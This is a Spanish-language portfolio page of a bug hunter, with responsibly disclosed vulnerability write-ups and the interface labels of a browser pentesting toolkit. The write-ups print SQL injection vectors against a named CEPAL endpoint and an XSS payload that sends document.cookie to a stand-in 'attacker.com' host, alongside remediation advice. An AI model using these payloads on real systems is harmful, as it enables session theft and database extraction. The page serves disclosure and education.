[ ALERT MODE ]
_Y000!_
// SECURITY RESEARCHER & BUG HUNTER
LUIS GASTELUM
_Y000!_
Jefe de Área de Seguridad Informática — Gobierno del Estado de Querétaro
Bug Hunter • Pentester • ISO 27001 Auditor • Hall of Fame: ONU ×3 • Harvard
21 REPOS
227 FOLLOWERS
183★ TOP REPO
3× ONU HOF
5+ AÑOS BOUNTY
> whoami
Luis Alberto Gastelum Madero [_Y000!_]
> cat /etc/specialization
XSS • SQLi • Web Pentesting • OSINT • ISO 27001
> echo $STATUS
HUNTING FOR BUGS... ▇
// ABOUT
_Y000!_
Luis Alberto Gastelum Madero
> Profesional de ciberseguridad con más de 5 años de experiencia en investigación de vulnerabilidades, bug bounty y auditoría de seguridad. Actualmente me desempeño como Jefe de Área de Seguridad Informática en el Gobierno del Estado de Querétaro .
> He reportado vulnerabilidades críticas a organizaciones de clase mundial incluyendo la ONU (×3 Hall of Fame) , Harvard University — reconocimiento directo del CISO Christian Hamer — y múltiples programas en HackerOne y OpenBugBounty.
> Speaker en DragonJarCon , CyberSecureNation y EsLibre 2021 . Especializado en XSS, SQLi, OSINT y herramientas de reconocimiento automatizado.
> Certificado en ISO/IEC 27001 , CEH , CCNA y más. Top repositorio en GitHub con 183★ — colección de payloads XSS/SQL usada por la comunidad global.
Bug Bounty
Pentesting
OSINT
ISO 27001
XSS/SQLi
Recon
Bash/Python
// Terminal interactiva — escribe help para comandos disponibles
// Impacto global real — clic en cada pin para ver detalles
Hall of Fame
Thank You Letter
Home/Trabajo
Ponencia
Bug Bounty
// Hover en los nodos — metodología real de pentesting
🌐
UNITED NATIONS
Hall of Fame ×3
unite.un.org/ict-security/hall-fame Listado: "Luis Madero" XSS & responsible disclosure
🎓
HARVARD UNIVERSITY
Thank You Letter — CISO
Christian Hamer, CISO Vuln: Cross-Site Scripting HUIT Information Security — Feb 2021
🔒
OPENBUGBOUNTY
Bug Researcher Activo
Perfil: _Y000_ Responsible disclosure Universidades y gobiernos
📋
HACKERONE
Bug Hunter
Programa activo Web applications & APIs Responsible disclosure
“Thank you for taking the time to report this vulnerability to us responsibly. We appreciate your effort in helping keep Harvard and its community safe.”— Christian Hamer, CISO, Harvard University — Feb 23, 2021
// Vulnerabilidades documentadas y divulgadas responsablemente
// DESCRIPCIÓN
Parámetro GET sin sanitización en módulo de consulta pública de la plataforma estadística de CEPAL (Comisión Económica para América Latina, ONU). El parámetro era directamente concatenado en una query MySQL ejecutada con privilegios de root@%.
// VECTOR
GET /stats/query?id=1' AND SLEEP(5)--
GET /stats/query?id=1 UNION SELECT user(),version(),database()--
// IMPACTO
Extracción completa de base de datos estadística
Acceso a credenciales de usuarios internos
Potencial RCE vía INTO OUTFILE (MySQL root@%)
Afectaba datos públicos de 33 países de América Latina
// TIMELINE
🔍 Discovery
→
📧 Reporte a CEPAL CSIRT
→
✅ Confirmado
→
🛠 Parche aplicado
→
🏆 HOF ONU
// REMEDIACIÓN
Uso de prepared statements / parámetros vinculados. Principio de mínimo privilegio en cuentas de BD. WAF con reglas de inyección SQL.
// DESCRIPCIÓN
Archivo phpinfo.php accesible públicamente en servidor de producción de CEPAL. Exponía versión exacta de PHP, módulos cargados, rutas del sistema, variables de entorno y configuración de Apache.
// DATOS EXPUESTOS
PHP 7.2.x (versión con CVEs conocidos al momento)
Rutas absolutas del servidor (/var/www/...)
Variables de entorno con rutas de configuración
Módulos: mysql, curl, openssl — información para fingerprinting
// REMEDIACIÓN
Eliminar o restringir acceso a archivos phpinfo.php en producción. Deshabilitar display_errors y expose_php en php.ini.
// DESCRIPCIÓN
Parámetro de URL procesado por JavaScript en el cliente sin sanitización previa antes de ser insertado en el DOM vía innerHTML. Encontrado en módulo de búsqueda de la plataforma Drupal 10 de CEPAL.
// VECTOR
https://target.cepal.org/search?q=<img src=x onerror=alert(document.domain)>
https://target.cepal.org/search?q=<svg/onload=fetch('https://attacker.com?c='+document.cookie)>
// IMPACTO
Robo de sesión de usuarios autenticados
Defacement visual del sitio vía URL maliciosa
Phishing dirigido usando dominio legítimo de ONU
Posible bypass de CSP si misconfigured
// REMEDIACIÓN
Sanitizar inputs antes de insertarlos en el DOM. Usar textContent en lugar de innerHTML. Implementar CSP estricta con nonce. Actualizar Drupal al último minor release.
// MEDIUM — ÚLTIMOS ARTÍCULOS
// Cargando artículos de Medium...
// Base de datos de herramientas y payloads reales — github.com/Y000o
📊 PAYLOAD DATABASE
📁 REPOSITORIOS
🔁 GITHUB LIVE
TODAS LAS CATEGORIAS
XSS
SQL INJECTION
GOOGLE DORKS
SSTI / TEMPLATE
SSRF
XXE
TODOS LOS TAGS
custom (Y000)
bypass (WAF)
basic
auth bypass
union based
error based
blind
info gathering
waf comments
redirect
admin dork
file exposure
vuln detection
polyglot
encoding bypass
DOM based
framework (Angular/Vue)
blind XSS
blind boolean SQLi
time-based SQLi
out-of-band
stacked/2nd order
WAF bypass avanzado
Jinja2
Twig
FreeMarker
classic
cloud exposed
credentials
vuln scan
CARGAR DATOS LIVE
// GitHub API — 60 req/hora sin auth
// Presiona el boton para cargar datos en vivo desde api.github.com/users/Y000o
REPOSITORIO ↕
DESCRIPCIÓN
LENGUAJE ↕
★ ↕
⑂ ↕
TAGS
LINK
Calculadora CVSS v3.1 — Base Score interactivo
// NVD standard · sin conexión
0.0
NONE
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
📊 Batch — PT Report sin CVSS
Exploitability
Attack Vector (AV)
Network (0.85)
Adjacent (0.62)
Local (0.55)
Physical (0.20)
Attack Complexity (AC)
Low (0.77)
High (0.44)
Privileges Required (PR)
None (0.85)
Low (0.62)
High (0.27)
User Interaction (UI)
None (0.85)
Required (0.62)
Scope (S)
Unchanged
Changed
Impact
Confidentiality (C)
None (0.00)
Low (0.22)
High (0.56)
Integrity (I)
None (0.00)
Low (0.22)
High (0.56)
Availability (A)
None (0.00)
Low (0.22)
High (0.56)
↺ Reset
⧉ Copy vector
Port Reference — servicios · protocolos · vectores comunes
// referencia rápida para recon y pentesting
PUERTO SERVICIO PROTO NOTAS / VECTORES
Encoder / Decoder — Base64 · URL · HTML · Hex · ROT13 · Unicode
// todo local, nada sale del navegador
Base64 ▶
◀ Base64
📝 Payload → PT
URL ▶
◀ URL
HTML ▶
◀ HTML
Hex ▶
◀ Hex
ROT13
Unicode ▶
MD5+SHA
Certificate Transparency — subdominios via crt.sh / SSL certs
// sin API key · fuente: crt.sh
%.dominio (subdominios)
dominio exacto
*.dominio
📜 BUSCAR
Solo activos
Expirados
Todos
⬇ Export TXT
📡 → Monitor
// Busca subdominios registrados en logs públicos de Certificate Transparency
ASN Lookup — rangos IP · organización · país
// ipapi.co + Shodan InternetDB + deep links // sin API key
🌐 LOOKUP
👁 → Monitor
// Ingresa un número ASN (AS13335), dominio o IP
JWT Inspector — decode · inspect · verify signature
// todo local · ningún token sale del navegador
Alg:
Tipo:
Expira:
Emitido:
Estado:
🔑 Verificar
🔓 Crack común
✕
// AUTO-ATTACK
💀 alg:none bypass
🔑 Brute-force secret
🗂 kid injection
🔄 RS256→HS256
⚗ FORGE token
// FORGE — modifica payload y re-firma con el secret encontrado
// Payload (JSON editable)
⚗ GENERAR TOKEN FORJADO
Payload Obfuscator — XSS · SQLi · evasión de WAF/filtros
// solo para pentesting autorizado
XSS
SQL Injection
LFI / Path Traversal
Command Injection
SSTI / Template Injection
RCE / Command Exec
XXE Injection
SSRF
NoSQL Injection
Open Redirect
HTML Entities
Double URL Encode
Unicode Escape
Hex Characters
Case Mixing (XSS)
Null Bytes
Comment Breaking (SQLi)
String Concat Break
All techniques (multi-output)
🎭 OBFUSCAR
// OUTPUT OBFUSCADO
⧉ Copy
✕
CIDR / Subnet Calculator — rangos IPv4 · hosts · broadcast · máscaras
// local · sin red
📐 CALCULAR
👁 → Monitor
RFC1918:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
192.168.1.0/24
0.0.0.0/0
▼ Ver todas las IPs del rango
Dividir en subredes /
Dividir
⬇ Export
Google Dork Generator — OSINT · asset discovery · recon pasivo
// para pentesting autorizado y bug bounty
Todas las categorías
Exposición de archivos
Paneles de login
Configuraciones
Bases de datos
Git / Código fuente
Cloud / Storage
Vulnerabilidades
Info disclosure
Subdominios
🔎 GENERAR
▶ Abrir todos
⧉ Copiar todos
⬇ Export TXT
CVE Search — busca por producto · CVE-ID · CVSS · EPSS · CISA KEV
// sin API key · Shodan CVEDB
🛑 BUSCAR
// Busca CVEs por tecnología/versión o por ID directo
Bug Bounty Scope — HackerOne · Bugcrowd · Intigriti
// verifica si el dominio está en scope
🏆 VERIFICAR
// Busca si el dominio tiene programa de bug bounty activo
WAF Fingerprint — detecta WAF activo y tipo
// basado en headers, respuesta y comportamiento
🛡 DETECTAR
// Detecta Cloudflare, ModSecurity, AWS WAF, Imperva, Akamai, F5, Sucuri y más
⬇ Export
Payload Testing Visual — XSS · SQLi · LFI · SSTI · RCE
// genera casos de prueba por tecnología y bypass de WAF
XSS — Cross-Site Scripting
SQLi — SQL Injection
LFI — Local File Inclusion
RCE — Command Injection
SSTI — Template Injection
XXE — XML Injection
Open Redirect
SSRF
Sin WAF / Generic
Cloudflare
ModSecurity
AWS WAF
Imperva / Incapsula
Akamai
F5 BIG-IP ASM
HTML context
HTML attribute
JavaScript context
URL parameter
JSON body
XML / SOAP
HTTP Header
⧉ Copiar todos
⬇ Export TXT
Fuzzing Wordlist — por tecnología detectada · directorios · endpoints
// específica para cada stack tecnológico
WordPress
Drupal
Joomla
Magento
Laravel / PHP
Django / Python
Ruby on Rails
Spring Boot / Java
Express / Node.js
ASP.NET
Apache
Nginx
IIS
Tomcat
REST API genérica
GraphQL
Admin Panels genérico
🌐 Subdominios (500 comunes)
Directorios
Archivos sensibles
Endpoints API
Backups / Config
Todo
📋 GENERAR
→ PATH FUZZ
🎯 TARGET
🎯 TARGET
⧉ Copiar
⬇ Export TXT
▶ Copiar cmd gobuster
▶ Copiar cmd ffuf
🗺 MAP IT
URLSCAN.IO
CLR
📌 IPs → IOCs
Todos
PHP
ASP/ASPX
JavaScript
JSON/API
Con parámetros
Admin/Login
Backup/Config
⏳ BUSCAR CDX
CLR
📄 Exportar PDF
🎯 Auto-marcar desde TARGET
↺ Reset
// Auto-marcado desde TARGET scan — revisa y ajusta manualmente los resultados
TODO
INFO
CONFIG
AUTHN
AUTHZ
INPVAL
SESS
CRYPTO
CLIENT
Regex Tester — test · highlight · librería de patrones comunes
// local · sin envío de datos
🔎 → Secrets
global (g)
global + case (gi)
global + multiline (gm)
case insensitive (i)
exacto
Email
IP
URL
JWT
API Key
SQLi chars
XSS chars
Base64
CVE ID
IPv6
HTTP HackBar — URL parser · payload injector · encoder · multi-proxy · export
// GET/HEAD via proxy chain · POST/PUT/DELETE → curl / Python / Burp
GET POST PUT
PATCH DELETE HEAD
OPTIONS TRACE
⛏ Parse
▶ SEND
// Query Params
+ Agregar
#fragment:
✕ Cerrar
📦 Body
💉 Payloads
🔐 Encode
🕐 History
// Modo:
Raw
JSON
form-urlencoded
XML/SOAP
⊞ Format
✕ Clear
// Click → copia al clipboard · Enfoca un param en el dissector primero para inyectar directo
URL Enc
URL Dec
Double URL
B64 Enc
B64 Dec
→ Hex
Hex →
HTML Enc
HTML Dec
Unicode Esc
ROT13
MD5
SHA-1
SHA-256
JWT Decode
// Últimas 15 peticiones — click para recargar
✕ Limpiar
// GET/HEAD: proxy chain · POST/PUT/DELETE: export only
⧉ cURL
🐍 Python
🔥 Burp XML
Utils — UUID · tokens · favicon hash · user-agents · password strength
// todo local
// RANDOM GENERATORS
UUID v4
UUID v7
Token 32B
Token 64B
API Key
JWT Secret
Nonce
Password fuerte
click para copiar
// USER-AGENT GENERATOR
Chrome / Windows
Chrome / macOS
Firefox / Windows
Safari / iOS
Android Chrome
Googlebot
Bingbot
cURL
Python requests
Burp Suite
sqlmap
🎲 Aleatorio
🎲 REGENERAR
Exploit Search — Exploit-DB · CIRCL · GitHub PoC · PacketStorm
// busca PoCs y exploits por CVE o tecnología
Todas las fuentes
Exploit-DB
GitHub PoC
CIRCL CVE
💥 BUSCAR
// Quick:
Log4Shell
Spring4Shell
Heartbleed
Shellshock
EternalBlue
Drupalgeddon
WP xmlrpc
Nuclei Templates — busca templates por CVE · tecnología · severidad · tag
// ProjectDiscovery GitHub · sin API key
Toda severidad
Critical
High
Medium
Low
Info
⚛ BUSCAR
// Quick:
CVEs recientes
SQLi
XSS
LFI
RCE
SSRF
Default Login
Exposure
Misconfig
Takeover
GraphQL Security — detectar · introspection · queries de ataque
// via proxy · field suggestion · batch attacks
⬡ SCAN GRAPHQL
// Endpoints comunes:
graphql
api/graphql
v1/graphql
graphiql
query
api
S3 Bucket Finder — Amazon S3 · Azure Blob · GCP Storage · permutaciones
// HEAD requests via proxy · sin API key
Todos los proveedores
Amazon S3
Azure Blob
Google Cloud
🪣 BUSCAR
Param Discovery — 200+ parámetros comunes · detecta respuestas diferentes · arjun-lite
// GET/POST · length diff · reflection detection
GET
POST
🔬 SCAN
// Wordlist:
Comunes (50)
Extended (150)
API (80)
Debug (30)
Port Scanner — Shodan como Nmap · puertos · banners · versiones · CVEs
// InternetDB (sin key) · API completa (con key Shodan)
Key actual:
// click para verificar
// FLAGS — estilo nmap
-p
all (todos)
top 20
top 100
web (80,443,8080,8443)
db (3306,5432,27017,6379,9200)
remote (22,23,3389,5900,5985)
custom...
-sV
-sC
--script vuln
--script banner
-O
-A
-o
Normal
Greppable (-oG)
JSON (-oJ)
nmap equiv:
nmap -sV -sC --script vuln -O {target}
⧉ copiar
Pentesting Report Builder — manual · vuln por vuln · correlación OWASP · PDF profesional
// Pre-carga desde TARGET · mapeo OWASP automático
➕ AGREGAR VULNERABILIDAD
🎯 Cargar desde TARGET
✅ Sincronizar OWASP
🛡 Sync MITRE
✕ Limpiar
// RECONOCIMIENTO
▶ Ver / Editar
🎯 Cargar desde TARGET
// CRONOLOGÍA DEL ENGAGEMENT
▶ Ver / Agregar
// RESUMEN EJECUTIVO
🤖 Generar con IA
// Claude genera el texto basado en tus vulnerabilidades
// CABECERAS HTTP SECURITY
▶ Ver / Editar
🛡 Cargar desde HEADERS
📄 Reporte Técnico PDF
📊 Reporte Ejecutivo PDF
⬇ JSON
⬇ CSV
⬇ MD
📋 + Log
⬇ CSV
⬇ MD
⬆ Import JSON
DNS Recon — A · AAAA · MX · NS · TXT · SOA · CNAME · SRV · AXFR
// Google DNS · sin API · zone transfer attempt
ALL (todos)
A AAAA
MX NS
TXT SOA
CNAME SRV
PTR CAA
AXFR (zone transfer)
🌀 QUERY
⬇ Export
🔭 SHODAN EXPLORER
// Key no configurada — ve a 🔍 RECON
⟳ Cuenta
📡 Mi IP
🗂 Puertos activos
🔍 Search
📊 Count / Facets
🖥 Host Lookup
🌐 DNS Tools
💥 Exploits DB
⚡ Búsquedas Rápidas
🛠 Query Builder
📈 Stats
p.1 p.2
p.3 p.4 p.5
🔍 BUSCAR
// Filtros comunes:
port:
country:
org:
hostname:
product:
version:
os:
vuln:
http.title:
ssl.cn:
net:
asn:
has_vuln
favicon.hash:
tag:
// Shodan Exploits DB — búsqueda gratuita, sin créditos
Todos los tipos
Remote
Local
DoS
Web Apps
💥 BUSCAR
// Construye la query visualmente
🔍 Buscar en Shodan
📊 Solo Count (gratis)
⧉ Copiar query
↗ Abrir en Shodan.io
// Dashboard automático — Count + Facets gratis · sin créditos de query
📈 ANALIZAR
Nmap Online — HackerTarget · 10 puertos comunes · output real de Nmap
// api.hackertarget.com/nmap · key gratuita en hackertarget.com
🗺 SCAN
📝 → PT Report
// 21 22 23 25 80 110 143 443 445 3389 — Powered by Nmap 7.x via HackerTarget
Reverse IP Lookup — descubre todos los sitios hosteados en el mismo servidor
// api.hackertarget.com · key gratuita en hackertarget.com
🔄 LOOKUP
// Virtual hosting discovery — encuentra otros dominios apuntando a la misma IP
Path Discovery — rutas y endpoints históricos del target — Wayback Machine + CommonCrawl
// equivalente a gau · sin API key · descubrimiento pasivo
Wayback + CommonCrawl
Solo Wayback
Solo CommonCrawl
Todos los paths
Solo .php
Solo .aspx / .asp
Solo .js
Solo /api/
Admin / panel
Con parámetros (?)
📂 DISCOVER
⧉ COPY ALL
⬇ EXPORT TXT
// Consulta Wayback CDX API y CommonCrawl Index para paths históricamente conocidos
📝 Paths → Wordlist
Threat Actor Database — grupos APT · técnicas MITRE · malware · sectores objetivo
// MITRE ATT&CK Groups · datos cargados desde GitHub
Todos los países
China
Rusia
Corea del Norte
Irán
USA
📂 CARGAR
// Clic en CARGAR para obtener datos de grupos APT desde MITRE ATT&CK
Incident Timeline — línea de tiempo interactiva · eventos · IOCs · técnicas MITRE
// persistente en localStorage · export PNG + TXT
➕ EVENTO
⬇ TXT
📝 → PT
↺ Reset
OSINT Social — username · email · breach check · redes sociales · perfiles
// HaveIBeenPwned (gratis) · búsqueda en 25+ plataformas
Username
Email / Breach
👤 BUSCAR
// Username: busca en 37 plataformas (HEAD no-cors + allorigins fallback) · opaque=existe · Email: HIBP breach check + dorks
CWE Database — Common Weakness Enumeration · búsqueda por ID o keyword · relación con CVE
// cwe.mitre.org · datos embebidos (top 25 + comunes)
🏆 TOP 25
TODOS
Incident Dashboard — vista unificada del incidente · métricas en tiempo real · correlaciones
// agrega TARGET + Intel Hub + IOCs + MITRE + PT Report
🔄 REFRESH
📄 EXPORT BRIEF
📦 EXPORT COMPLETO
Shodan Monitor — alertas de cambios · nuevos puertos · CVEs nuevos · comparación automática
// requiere Shodan API key · persiste entre sesiones · refresh manual o automático
➕ MONITOREAR
🔄 CHECK ALL
✕ Limpiar
// Requiere Shodan API key configurada en el módulo SHODAN · Compara snapshot anterior vs actual · Alerta en cambios
Scope Manager — define IN/OUT del pentest · valida targets · ROE · compatible HackerOne/BugCrowd
// previene salirte del scope · localStorage
// Targets IN SCOPE (dominios, IPs, CIDRs — uno por línea)
// Targets OUT OF SCOPE (uno por línea)
// Rules of Engagement (ROE)
📄 Export TXT
📄 Export JSON
🐛 Import HackerOne JSON
SSL/TLS Analyzer — cipher suites · grade · PFS · HSTS preload · cert chain · vulnerabilidades
// ssllabs-like · sin API key · múltiples fuentes
🔐 ANALIZAR
// Consulta múltiples fuentes: crt.sh · dns.google · securityheaders.com · badssl.com checks
Cookie & Session Analyzer — flags · entropía · formato · patrón de incremento · CVSS por hallazgo
// detecta session tokens débiles · genera vuln en PT Report
// Pega el header Set-Cookie completo o solo el valor de la cookie
🍪 ANALIZAR
✕ Limpiar
// Soporta: JWT · base64 · hex · UUID · session IDs arbitrarios
Subdomain Monitor — detecta nuevos subdominios · cambios de IP · posibles takeovers · historial
// crt.sh + DNS · snapshot en localStorage · sin API key
➕ MONITOREAR
🔄 CHECK ALL
✕
// Compara subdominios actuales vs snapshot · alerta si aparece nuevo sub o cambia la IP
Favicon Hash Search — MurmurHash · Shodan · FOFA · Censys · ZoomEye · fingerprint de infraestructura
// calcula MurmurHash32 del favicon · genera queries para cada buscador
🔍 HASH
// Descarga el favicon, calcula MurmurHash (formato Shodan), MD5 y SHA256 — genera queries para OSINT
Risk Score — score unificado 0-100 · pondera CVEs · headers · IOCs · MITRE · hallazgos
// agrega todos los módulos activos · gauge visual · recomendaciones
⚡ CALCULAR RIESGO
📄 Export
📊 Dashboard
// Agrega TARGET + Intel Hub + IOCs + MITRE + PT Report
Auto-Report Builder — genera executive brief automático · sin AI externa · basado en datos reales del toolkit
// combina TARGET + Intel Hub + MITRE + PT Report · export TXT/MD
Executive Summary (directivos)
Technical Report (ingenieros)
Bug Bounty Submission
Incident Response Brief
Español
English
🤖 GENERAR
⬇ TXT
⬇ MD
⬇ CSV Vulns
Session Logger — timeline automática de actividad · qué módulo · qué target · cuándo
// se loggea silenciosamente · demuestra metodología · export para reportes
⬇ Export TXT
🗑 Limpiar
Auto-logging activo
// Cada ejecución de módulo queda registrada automáticamente con timestamp, módulo y target
Blind XSS Tracker — genera payloads · callback management · interactsh · detección out-of-band
// para XSS que ejecutan en paneles admin o emails · sin servidor propio
💣 Generar payloads
📡 Check callbacks
🔑 Nueva sesión
Session ID: Sin sesión — click en 🔑 Nueva sesión
Case Manager — guarda y restaura el estado completo del toolkit · multi-proyecto · snapshots
// persiste TARGET, IOCs, vulns, MITRE, Timeline por caso
➕ NUEVO CASO
// 💾 guarda estado · ↩ restaura · ⬇ exporta JSON
// Un snapshot guarda: TARGET data, IOCs, PT Report vulns, MITRE técnicas, Incident Timeline
OWASP Coverage Tracker — cobertura visual del Top 10 basada en tus vulns del PT Report · detecta gaps · sugerencias de testing
✅ ANALIZAR COBERTURA
📝 → PT Report
// Auto-mapea tus vulns del PT Report a las 10 categorías OWASP
CVE Patch Gap — deuda de parches · días sin parchear por CVE · timeline de publicación vs hoy · score de negligencia
🕐 ANALIZAR GAPS
📝 → PT Report
// Lee CVEs del TARGET scan · consulta NVD para fechas de publicación
Attack Correlation Engine — cadenas de ataque automáticas · CVE→técnica→vector→siguiente paso · probabilidad por cadena
// lee TARGET + PT Report + MITRE · detecta rutas probables de compromiso
⛓ GENERAR CADENAS
📝 → PT Report
🕸 → ASIG
// Análisis automático — no requiere input manual
Email Harvester — recolección pasiva de emails · Hunter.io free · Google dorks · CRT.SH cert fields · sin API key requerida
📧 HARVEST
→ OSINT
📌 → IOC
📝 → PT
//
hunter.io (25 req/mes gratis) · Google dorks · CRT.SH · resultados 100% pasivos
Link Hub — 179 recursos curados · recon · exploit · dark web · OSINT · training · compliance · búsqueda instantánea · favoritos
Todas 🎯 Recon 🔍 Scan
💀 Vulns 💥 Exploit 🌐 Web
📡 Network 🔐 Crypto 🕷 Dark Web
🛡 Threat 📋 Report 🎓 Training
🛠 Tools 🏛 Gov
↗ Abrir todos
Dark / Deep Web Monitor — ransomware.live · ransomwatch · psbdmp · Ahmia Tor · sin Tor Browser · auto-IOC
🕷 DARK SCAN
← TARGET
📡 Feed víctimas
🎭 Grupos activos
↺
🔗 DARK WEB LINKS
Todos 🔍 Motores 📰 Noticias
🔴 Ransomware 📋 Pastes 🛒 Mercados
🕵 OSINT 🛠 Tools 💬 Foros 🌐 Clearnet
⚠ Links 🧅 requieren Tor Browser · Solo para investigación de seguridad autorizada
Evidence Manager — adjunta screenshots a hallazgos · Ctrl+V para pegar · incluido en PDF técnico · drag and drop
📋 Pegar screenshot
📁 Subir imagen
📝 Texto/PoC
🗑 Limpiar
📋 Click aquí y Ctrl+V para pegar screenshot — o arrastra una imagen
Vuln:
— General —
↻
Credential Exposure — HaveIBeenPwned · LeakIX · Shodan · sin API key · auto-IOC en hits críticos
🔍 BUSCAR EXPOSICIONES
← TARGET
Attack Path Visualizer — rutas de ataque desde vulns del PT Report · fases MITRE · sin IA · export a PT Report
⚡ ANALIZAR RUTAS
📝 → PT Report
Supply Chain Analyzer — CVEs en dependencias via OSV.dev · typosquatting · npm · pip · go.mod · pom.xml
🔍 ANALIZAR
🗑 Limpiar
Forensics Light — EXIF · metadata · strings · magic bytes · esteganografía LSB · extracción IoCs — todo en cliente, sin subir archivos
📁 Analizar archivo
📋 Analizar texto
📌 → IOC Manager
🗑
Threat Modeling STRIDE — análisis por componente · Spoofing/Tampering/Repudiation/InfoDisc/DoS/EoP · MITRE + OWASP
🧩 ANALIZAR STRIDE
Un componente por línea
Persona Builder — identidades ficticias coherentes para red team · nombre · empresa · email · LinkedIn · teléfono
💻 Tech 💰 Finanzas 🏛 Gobierno ⚕ Salud
🇲🇽 México 🇺🇸 USA 🇪🇸 España
👤 GENERAR PERSONA
Red Team Timer — cronómetro por fases · operator log con timestamps · alertas de tiempo límite · export .txt
🔍 Recon
📡 Enum
💥 Exploit
🔒 Post
📋 Report
+ Log
Email Security Analyzer — headers · SPF/DKIM/DMARC · origen real · detección de phishing · extracción de IoCs automática
🔍 ANALIZAR
📋 Ejemplo phishing
🗑
Container & Cloud Attack Surface — Docker · Kubernetes · etcd · Vault · Consul · Prometheus · 28 servicios · auto-PT Report
🐳 CONTAINER SCAN
← TARGET
Mobile Quick Scanner — Exodus Privacy trackers · permisos peligrosos · CVEs · herramientas de análisis estático/dinámico
🤖 Android 🍎 iOS
📱 ANALIZAR
IaC Scanner — Terraform · Kubernetes YAML · CloudFormation · 35+ reglas · secrets hardcoded · export a PT Report
🏗 ESCANEAR IaC
🗑 Limpiar
Terraform · K8s YAML · CloudFormation — análisis 100% en cliente
Subdomain Takeover Checker — CNAME huérfanos · 15 servicios · GitHub · Heroku · Azure · S3 · Netlify · Shopify · DNS + HTTP fingerprint
🎯 VERIFICAR
← TARGET
🔄 Desde CRT.SH
Phishing Page Detector — score 0-100 · lookalike domains · URLScan · VirusTotal · Google Safe Browsing · → IOC Manager
🎣 DETECTAR
🗑
CTRL-MAP — Framework Correlator — MITRE ATT&CK · OWASP · NIST CSF 2.0 · NIST 800-53 · SCF C|P-RMM · 3 modos: PIVOT / MATRIX / GAP
MITRE ATT&CK v14
OWASP Top 10 2021
NIST CSF 2.0
NIST 800-53 Rev.5
SCF C|P-RMM
↻ cargando ATT&CK completo...
① PIVOT
② MATRIX
③ GAP
// busca desde cualquier framework → navega a todos los demás · acepta: ID MITRE · OWASP · NIST · texto libre
SEARCH ▶
CLR
// heatmap de cobertura · click en celda para drill-down
EJE Y:
Tácticas MITRE
Categorías OWASP
Funciones NIST CSF 2.0
Dominios SCF
FILTRO:
Todos los niveles
Solo brechas (sin mapeo)
Solo alta densidad
Alta cobertura
Media
Baja
Sin mapeo
⚠ = brecha crítica
// carga tus hallazgos de pentest → análisis automático de brechas por framework
↓ EXPORT JSON
→ PT REPORT
__ ____ ___ ___ _
\ \ / / _ \| \ / _ \| |
\ V /| (_) | |) | (_) | |__
|_| \___/|___/ \___/|____|
KONAMI UNLOCKED -- _Y000!_
FLAG:
// Easter egg encontrado. Escribe y000 en el terminal.
FLAG MASTER:
[ CERRAR ]
ALL FLAGS CAPTURED -- _Y000!_
MASTER HACKER CONFIRMED
Score: pts
Eres un verdadero hacker. El portafolio te reconoce.
[ CONTINUE ]